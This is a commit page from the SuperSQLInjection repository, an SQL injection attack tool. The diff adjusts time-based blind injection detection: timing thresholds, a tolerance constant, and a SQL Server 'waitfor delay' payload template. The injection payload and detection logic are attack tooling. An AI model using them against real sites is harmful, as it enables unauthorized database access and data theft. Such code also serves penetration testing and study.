shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update20190404

Browse Source 
20190404 V1.0 正式版---
修复延时注入部分情况下无法获取数据的问题,优化注入判断。
This commit is contained in:
shack2
2019-04-04 16:43:55 +08:00
parent 0a46dc3500
commit 0414049918
5 changed files with 19 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
SuperSQLInjection/Main.cs
View File

@@ -311,7 +311,7 @@ namespace SuperSQLInjection
return sid; return sid;
} }
public static int version = 20190403; public static int version = 20190404;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新 //检查更新
public void checkUpdate() public void checkUpdate()
@@ -6859,8 +6859,8 @@ namespace SuperSQLInjection
//读取payload //读取payload
List<String> sleep_list = FileTool.readFileToList("config/injection/sleep_injection.txt"); List<String> sleep_list = FileTool.readFileToList("config/injection/sleep_injection.txt");
//测试平均时间5 //测试平均时间3
int n = 5; int n = 3;
int index = 0; int index = 0;
List<int> time_list = new List<int>(); List<int> time_list = new List<int>();
while (index < n) while (index < n)
@@ -6875,7 +6875,7 @@ namespace SuperSQLInjection
int avg = Tools.getMaxSecondByMillisecond(Tools.getAvg(time_list)); int avg = Tools.getMaxSecondByMillisecond(Tools.getAvg(time_list));
if (avg != 0) if (avg != 0)
{ {
int time = avg + 2; int time = avg + 1;
if (config.timeOut < time) if (config.timeOut < time)
{ {
@@ -6897,18 +6897,18 @@ namespace SuperSQLInjection
config.timeOut += 5; config.timeOut += 5;
} }
} }
String[] pals = cpal.Split(DBVers_Splite_Str); String[] pals = cpal.Split(DBVers_Splite_Str);
String cpayload = pals[0].Replace("{time}", time.ToString()); String cpayload = pals[0].Replace("{time}", time.ToString());
this.txt_log.Invoke(new showLogDelegate(log), "正在测试PayLoad:" + cpayload, LogLevel.info); this.txt_log.Invoke(new showLogDelegate(log), "正在测试PayLoad:" + cpayload, LogLevel.info);
ServerInfo sleepServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cpayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); ServerInfo sleepServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cpayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
if (sleepServer.runTime > time * 1000) if (sleepServer.runTime > time * 1000-Tools.deviation)
{ {
this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Time); this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Time);
this.chk_inject_reverseKey.Checked = false; this.chk_inject_reverseKey.Checked = false;
config.injectType = InjectType.Blind; config.injectType = InjectType.Blind;
sleepInject = true; sleepInject = true;
selectInjectType(InjectType.Blind); selectInjectType(InjectType.Blind);
newParam = strparam.Replace(param, param + "<Encode>" + cpayload.Replace(pals[3], setInjectStr) + "</Encode>"); newParam = strparam.Replace(param, param + "<Encode>" + pals[0].Replace(pals[3], setInjectStr) + "</Encode>");
config.request = request.Replace(strparam, newParam); config.request = request.Replace(strparam, newParam);
this.txt_inject_request.Text = request.Replace(strparam, newParam); this.txt_inject_request.Text = request.Replace(strparam, newParam);
currentDB = pals[2]; currentDB = pals[2];

4
SuperSQLInjection/Properties/AssemblyInfo.cs
View File

@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值, // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”: // 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")] // [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.04.03")] [assembly: AssemblyVersion("1.2019.04.04")]
[assembly: AssemblyFileVersion("1.2019.04.03")] [assembly: AssemblyFileVersion("1.2019.04.04")]

2
SuperSQLInjection/payload/SQLServer.cs
View File

@@ -92,7 +92,7 @@ namespace SuperSQLInjection.payload
public static String getBoolDataBySleep(String data, int maxTime) public static String getBoolDataBySleep(String data, int maxTime)
{ {
return " 1=1 if(" + data + ") waitfor delay '0:0:" + maxTime + "'"; return " if(" + data + ") waitfor delay '0:0:" + maxTime + "'";
} }
/// <summary> /// <summary>

5
SuperSQLInjection/tools/Tools.cs
View File

@@ -21,6 +21,9 @@ namespace tools
{ {
public const String httpLogPath = "logs/http/"; public const String httpLogPath = "logs/http/";
//由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
public const int deviation = 20;
public static long currentMillis() public static long currentMillis()
{ {
return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds; return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
@@ -495,7 +498,7 @@ namespace tools
case KeyType.Time: case KeyType.Time:
//由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) //由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
int time = Tools.convertToInt(key); int time = Tools.convertToInt(key);
if (server.runTime > (time*1000-(time*20))) if (server.runTime > (time*1000-(time*deviation)))
{ {
if (reverKey) if (reverKey)
{ {

7
update.txt
View File

@@ -1,8 +1,11 @@
20190403 V1.0 正式版--- 20190404 V1.0 正式版---
修复延时注入部分情况下无法获取数据的问题,优化注入判断。
20190403 V1.0 正式版---
修复因为导入配置文件编码有可能为空值导致无法正确解码而报错无法获取数据的问题。(程序异常提示:获取值发生异常:“”不是支持的编码名)。 修复因为导入配置文件编码有可能为空值导致无法正确解码而报错无法获取数据的问题。(程序异常提示:获取值发生异常:“”不是支持的编码名)。
20190319 V1.0 正式版--- 20190319 V1.0 正式版---
修复变量无法复制问题。 修复环境变量无法复制问题。
修复MySQL部分情况下当字段出现空值无法获取数据的问题。 修复MySQL部分情况下当字段出现空值无法获取数据的问题。
20190310 V1.0 正式版--- 20190310 V1.0 正式版---